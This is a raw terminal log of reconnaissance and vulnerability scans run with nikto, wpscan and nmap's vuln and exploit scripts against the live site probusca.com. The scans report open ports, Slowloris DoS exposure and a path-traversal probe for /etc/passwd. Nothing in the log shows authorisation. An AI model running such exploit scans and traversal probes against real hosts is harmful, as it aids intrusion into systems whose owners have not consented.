wget http://www.computec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz
http://www.probusca.com [301 Moved Permanently] 
Apache[2.4.18], 
Country[UNITED STATES][US], 
HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], 
IP[54.94.171.46], 
RedirectLocation[https://www.probusca.com/], 
Title[301 Moved Permanently]
https://www.probusca.com/ [301 Moved Permanently] 
Apache[2.4.18], 
Country[UNITED STATES][US], 
HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], 
IP[54.94.171.46], 
RedirectLocation[https://probusca.com/], 
Title[301 Moved Permanently]
https://probusca.com/ [200 OK] 
Apache[2.4.18], 
Country[UNITED STATES][US], 
HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], 
IP[54.94.171.46], PasswordField[senha], 
Script[text/javascript], Title[PROBusca]

┌─[✗]─[user@parrot]─[~]
└──╼ $sudo nikto -h www.probusca.com
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          54.94.171.46
+ Target Hostname:    www.probusca.com
+ Target Port:        80
+ Start Time:         2018-09-08 23:22:43 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: https://www.probusca.com/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
^[[A
+ ERROR: Error limit (20) reached for host, giving up. Last error: opening stream: can't connect (timeout): Operation now in progress
+ Scan terminated:  20 error(s) and 3 item(s) reported on remote host
+ End Time:           2018-09-08 23:37:00 (GMT0) (857 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.18) are not in
      the Nikto database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to sullo@cirt.net) (y/n)? y

+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ ERROR 302: Update failed, please notify sullo@cirt.net of this code.

┌─[✗]─[root@parrot]─[/home/user]
└──╼ #wpscan --url www.probusca.com --random-agent
_______________________________________________________________
        __          _______   _____                  
        \ \        / /  __ \ / ____|                 
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ 
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team 
                       Version 2.9.4
          Sponsored by Sucuri - https://sucuri.net
      @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[+] User-Agent: Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0

[!] The WordPress URL supplied 'http://www.probusca.com/' seems to be down. Maybe the site is blocking the user-agent?


┌─[root@parrot]─[/usr/share/nmap/scripts]
└──╼ #nmap -sV --verbose --script vuln www.probusca.com
Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-09 00:01 UTC
NSE: Loaded 145 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 00:01
Completed NSE at 00:01, 10.00s elapsed
Initiating NSE at 00:01
Completed NSE at 00:01, 0.00s elapsed
Initiating Ping Scan at 00:01
Scanning www.probusca.com (54.94.171.46) [4 ports]
Completed Ping Scan at 00:01, 0.20s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 00:01
Completed Parallel DNS resolution of 1 host. at 00:01, 0.55s elapsed
Initiating SYN Stealth Scan at 00:01
Scanning www.probusca.com (54.94.171.46) [1000 ports]
Discovered open port 80/tcp on 54.94.171.46
Discovered open port 21/tcp on 54.94.171.46
Discovered open port 443/tcp on 54.94.171.46
Discovered open port 22/tcp on 54.94.171.46
Discovered open port 10000/tcp on 54.94.171.46
SYN Stealth Scan Timing: About 47.18% done; ETC: 00:03 (0:00:35 remaining)
Increasing send delay for 54.94.171.46 from 0 to 5 due to max_successful_tryno increase to 4
Discovered open port 15004/tcp on 54.94.171.46
SYN Stealth Scan Timing: About 64.90% done; ETC: 00:03 (0:00:36 remaining)
Completed SYN Stealth Scan at 00:03, 113.94s elapsed (1000 total ports)
Initiating Service scan at 00:03
Scanning 6 services on www.probusca.com (54.94.171.46)
Completed Service scan at 00:04, 24.03s elapsed (6 services on 1 host)
NSE: Script scanning 54.94.171.46.
Initiating NSE at 00:04
Stats: 0:03:36 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE: Active NSE Script Threads: 127 (110 waiting)
NSE Timing: About 84.34% done; ETC: 00:05 (0:00:12 remaining)
Stats: 0:05:25 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE: Active NSE Script Threads: 31 (30 waiting)
NSE Timing: About 96.21% done; ETC: 00:07 (0:00:07 remaining)
Completed NSE at 00:09, 291.60s elapsed
Initiating NSE at 00:09
Completed NSE at 00:09, 0.00s elapsed
Nmap scan report for www.probusca.com (54.94.171.46)
Host is up (0.088s latency).
rDNS record for 54.94.171.46: ec2-54-94-171-46.sa-east-1.compute.amazonaws.com
Not shown: 990 filtered ports
PORT      STATE  SERVICE  VERSION
20/tcp    closed ftp-data
21/tcp    open   ftp      ProFTPD 1.3.5a
|_sslv2-drown: 
22/tcp    open   ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp    open   http     Apache httpd 2.4.18 ((Ubuntu))
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-fileupload-exploiter: 
|   
|_    Couldn't find a file-type field.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
443/tcp   open   ssl/ssl  Apache httpd (SSL-only mode)
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_sslv2-drown: 
10000/tcp open   http     MiniServ 1.890 (Webmin httpd)
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=www.probusca.com
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://www.probusca.com:10000/
|     Form id: save
|     Form action: /session_login.cgi
|     
|     Path: http://www.probusca.com:10000/session_login.cgi
|     Form id: save
|_    Form action: /session_login.cgi
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-majordomo2-dir-traversal: ERROR: Script execution failed (use -d to debug)
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
15000/tcp closed hydap
15002/tcp closed onep-tls
15003/tcp closed unknown
15004/tcp open   ssl/http Node.js Express framework
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_sslv2-drown: 
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 00:09
Completed NSE at 00:09, 0.00s elapsed
Initiating NSE at 00:09
Completed NSE at 00:09, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 441.73 seconds
           Raw packets sent: 6025 (264.848KB) | Rcvd: 127 (5.156KB)

┌─[root@parrot]─[/usr/share/nmap/scripts]
└──╼ #nmap -sV --verbose --script exploit www.probusca.com
Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-09 00:02 UTC
NSE: Loaded 87 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 00:02
Completed NSE at 00:02, 0.00s elapsed
Initiating NSE at 00:02
Completed NSE at 00:02, 0.00s elapsed
Initiating Ping Scan at 00:02
Scanning www.probusca.com (54.94.171.46) [4 ports]
Completed Ping Scan at 00:02, 0.20s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 00:02
Completed Parallel DNS resolution of 1 host. at 00:02, 0.55s elapsed
Initiating SYN Stealth Scan at 00:02
Scanning www.probusca.com (54.94.171.46) [1000 ports]
Discovered open port 21/tcp on 54.94.171.46
Discovered open port 80/tcp on 54.94.171.46
Discovered open port 443/tcp on 54.94.171.46
Discovered open port 22/tcp on 54.94.171.46
Discovered open port 15004/tcp on 54.94.171.46
SYN Stealth Scan Timing: About 48.35% done; ETC: 00:03 (0:00:33 remaining)
Discovered open port 10000/tcp on 54.94.171.46
Completed SYN Stealth Scan at 00:04, 80.18s elapsed (1000 total ports)
Initiating Service scan at 00:04
Scanning 6 services on www.probusca.com (54.94.171.46)
Completed Service scan at 00:04, 26.88s elapsed (6 services on 1 host)
NSE: Script scanning 54.94.171.46.
Initiating NSE at 00:04
Stats: 0:02:29 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE: Active NSE Script Threads: 54 (54 waiting)
NSE Timing: About 89.20% done; ETC: 00:05 (0:00:05 remaining)
Stats: 0:04:18 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE: Active NSE Script Threads: 5 (5 waiting)
NSE Timing: About 99.01% done; ETC: 00:07 (0:00:02 remaining)
Completed NSE at 00:08, 203.28s elapsed
Initiating NSE at 00:08
Completed NSE at 00:08, 3.11s elapsed
Nmap scan report for www.probusca.com (54.94.171.46)
Host is up (0.16s latency).
rDNS record for 54.94.171.46: ec2-54-94-171-46.sa-east-1.compute.amazonaws.com
Not shown: 990 filtered ports
PORT      STATE  SERVICE    VERSION
20/tcp    closed ftp-data
21/tcp    open   ftp        ProFTPD 1.3.5a
22/tcp    open   ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp    open   http       Apache httpd 2.4.18 ((Ubuntu))
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
443/tcp   open   ssl/https?
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
10000/tcp open   http       MiniServ 1.890 (Webmin httpd)
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=www.probusca.com
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://www.probusca.com:10000/
|     Form id: save
|     Form action: /session_login.cgi
|     
|     Path: http://www.probusca.com:10000/session_login.cgi
|     Form id: save
|_    Form action: /session_login.cgi
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-litespeed-sourcecode-download: 
| Litespeed Web Server Source Code Disclosure (CVE-2010-2333)
| /index.php source code:
| <!DOCTYPE HTML>
| <html data-background-style="gainsboro" class="session_login">
| <head>
|  <noscript> <style> html[data-background-style="gainsboro"] { background-color: #d6d6d6; } html[data-background-style="nightRider"] { background-color: #1a1c20; } html[data-background-style="nightRider"] div[data-noscript] { color: #979ba080; } html[data-slider-fixed='1'] { margin-right: 0 !important; } body > div[data-noscript] ~ * { display: none !important; } div[data-noscript] { visibility: hidden; animation: 2s noscript-fadein; animation-delay: 1s; text-align: center; animation-fill-mode: forwards; } @keyframes noscript-fadein { 0% { opacity: 0; } 100% { visibility: visible; opacity: 1; } } </style> <div data-noscript> <div class="fa fa-3x fa-exclamation-triangle margined-top-20 text-danger"></div> <h2>JavaScript is disabled</h2> <p>Please enable javascript and refresh the page</p> </div> </noscript>
| <meta charset="utf-8">
| <title>Login to Webmin</title>
| <link rel="shortcut icon" href="/images/favicon-webmin.ico">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <link href="/unauthenticated/css/bundle.min.css?1919999999999911" rel="stylesheet">
| <script>setTimeout(function(){var a=document.querySelectorAll('input[type="password"]');i=0;
| for(length=a.length;i<length;i++){var b=document.createElement("span"),d=30<a[i].offsetHeight?1:0;b.classList.add("input_warning_caps");b.setAttribute("title","Caps Lock");d&&b.classList.add("large");a[i].classList.add("use_input_warning_caps");a[i].parentNode.insertBefore(b,a[i].nextSibling);a[i].addEventListener("blur",function(){this.nextSibling.classList.remove("visible")});a[i].addEventListener("keydown",function(c){"function"===typeof c.getModifierState&&((state=20===c.keyCode?!c.getModifierState("CapsLock"):
| c.getModifierState("CapsLock"))?this.nextSibling.classList.add("visible"):this.nextSibling.classList.remove("visible"))})};},100);function spinner() {var x = document.querySelector('.fa-sign-in:not(.invisible)'),s = '<span class="cspinner_container"><span class="cspinner"><span class="cspinner-icon white small"></span></span></span>';if(x){x.classList.add("invisible"); x.insertAdjacentHTML('afterend', s);x.parentNode.classList.add("disabled");x.parentNode.disabled=true}}</script> <link href="/unauthenticated/css/fonts-roboto.min.css?1919999999999911" rel="stylesheet">
| </head>
| <body class="session_login">
| <div class="container session_login" data-dcontainer="1">
| 
| <form method="post" target="_top" action="/session_login.cgi" class="form-signin session_login clearfix" role="form" onsubmit="spinner()">
| <i class="wbm-webmin"></i><h2 class="form-signin-heading">
|      <span>Webmin</span></h2>
| <p class="form-signin-paragraph">You must enter a username and password to login to the server on<strong> www.probusca.com</strong></p>
| <div class="input-group form-group">
| <span class="input-group-addon"><i class="fa fa-fw fa-user"></i></span>
| <input type="text" class="form-control session_login" name="user" autocomplete="off" autocapitalize="none" placeholder="Username"  autofocus>
| </div>
| <div class="input-group form-group">
| <span class="input-group-addon"><i class="fa fa-fw fa-lock"></i></span>
| <input type="password" class="form-control session_login" name="pass" autocomplete="off" placeholder="Password"  >
| </div>
| <div class="input-group form-group">
|             <span class="awcheckbox awobject"><input class="iawobject" name="save" value="1" id="save" type="checkbox"> <label class="lawobject" for="save">Remember me</label></span>
|          </div>
| <div class="form-group form-signin-group"><button class="btn btn-primary" type="submit"><i class="fa fa-sign-in"></i>&nbsp;&nbsp;Sign in</button>
| </div></form>
| </div>
| </body>
|_</html>
|_http-majordomo2-dir-traversal: ERROR: Script execution failed (use -d to debug)
| http-phpmyadmin-dir-traversal: 
|   VULNERABLE:
|   phpMyAdmin grab_globals.lib.php subform Parameter Traversal Local File Inclusion
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2005-3299
|       PHP file inclusion vulnerability in grab_globals.lib.php in phpMyAdmin 2.6.4 and 2.6.4-pl1 allows remote attackers to include local files via the $__redirect parameter, possibly involving the subform array.
|       
|     Disclosure date: 2005-10-nil
|     Extra information:
|       ../../../../../etc/passwd :
|   <!DOCTYPE HTML>
|   <html data-background-style="gainsboro" class="session_login">
|   <head>
|    <noscript> <style> html[data-background-style="gainsboro"] { background-color: #d6d6d6; } html[data-background-style="nightRider"] { background-color: #1a1c20; } html[data-background-style="nightRider"] div[data-noscript] { color: #979ba080; } html[data-slider-fixed='1'] { margin-right: 0 !important; } body > div[data-noscript] ~ * { display: none !important; } div[data-noscript] { visibility: hidden; animation: 2s noscript-fadein; animation-delay: 1s; text-align: center; animation-fill-mode: forwards; } @keyframes noscript-fadein { 0% { opacity: 0; } 100% { visibility: visible; opacity: 1; } } </style> <div data-noscript> <div class="fa fa-3x fa-exclamation-triangle margined-top-20 text-danger"></div> <h2>JavaScript is disabled</h2> <p>Please enable javascript and refresh the page</p> </div> </noscript>
|   <meta charset="utf-8">
|   <title>Login to Webmin</title>
|   <link rel="shortcut icon" href="/images/favicon-webmin.ico">
|   <meta name="viewport" content="width=device-width, initial-scale=1.0">
|   <link href="/unauthenticated/css/bundle.min.css?1919999999999911" rel="stylesheet">
|   <script>setTimeout(function(){var a=document.querySelectorAll('input[type="password"]');i=0;
|   for(length=a.length;i<length;i++){var b=document.createElement("span"),d=30<a[i].offsetHeight?1:0;b.classList.add("input_warning_caps");b.setAttribute("title","Caps Lock");d&&b.classList.add("large");a[i].classList.add("use_input_warning_caps");a[i].parentNode.insertBefore(b,a[i].nextSibling);a[i].addEventListener("blur",function(){this.nextSibling.classList.remove("visible")});a[i].addEventListener("keydown",function(c){"function"===typeof c.getModifierState&&((state=20===c.keyCode?!c.getModifierState("CapsLock"):
|   c.getModifierState("CapsLock"))?this.nextSibling.classList.add("visible"):this.nextSibling.classList.remove("visible"))})};},100);function spinner() {var x = document.querySelector('.fa-sign-in:not(.invisible)'),s = '<span class="cspinner_container"><span class="cspinner"><span class="cspinner-icon white small"></span></span></span>';if(x){x.classList.add("invisible"); x.insertAdjacentHTML('afterend', s);x.parentNode.classList.add("disabled");x.parentNode.disabled=true}}</script> <link href="/unauthenticated/css/fonts-roboto.min.css?1919999999999911" rel="stylesheet">
|   </head>
|   <body class="session_login">
|   <div class="container session_login" data-dcontainer="1">
|   
|   <form method="post" target="_top" action="/session_login.cgi" class="form-signin session_login clearfix" role="form" onsubmit="spinner()">
|   <i class="wbm-webmin"></i><h2 class="form-signin-heading">
|        <span>Webmin</span></h2>
|   <p class="form-signin-paragraph">You must enter a username and password to login to the server on<strong> www.probusca.com</strong></p>
|   <div class="input-group form-group">
|   <span class="input-group-addon"><i class="fa fa-fw fa-user"></i></span>
|   <input type="text" class="form-control session_login" name="user" autocomplete="off" autocapitalize="none" placeholder="Username"  autofocus>
|   </div>
|   <div class="input-group form-group">
|   <span class="input-group-addon"><i class="fa fa-fw fa-lock"></i></span>
|   <input type="password" class="form-control session_login" name="pass" autocomplete="off" placeholder="Password"  >
|   </div>
|   <div class="input-group form-group">
|               <span class="awcheckbox awobject"><input class="iawobject" name="save" value="1" id="save" type="checkbox"> <label class="lawobject" for="save">Remember me</label></span>
|            </div>
|   <div class="form-group form-signin-group"><button class="btn btn-primary" type="submit"><i class="fa fa-sign-in"></i>&nbsp;&nbsp;Sign in</button>
|   </div></form>
|   </div>
|   </body>
|   </html>
|   
|     References:
|       http://www.exploit-db.com/exploits/1244/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3299
|_http-server-header: MiniServ/1.890
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
15000/tcp closed hydap
15002/tcp closed onep-tls
15003/tcp closed unknown
15004/tcp open   ssl/http   Node.js Express framework
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 00:08
Completed NSE at 00:08, 0.00s elapsed
Initiating NSE at 00:08
Completed NSE at 00:08, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 315.36 seconds
           Raw packets sent: 4020 (176.696KB) | Rcvd: 168 (8.977KB)
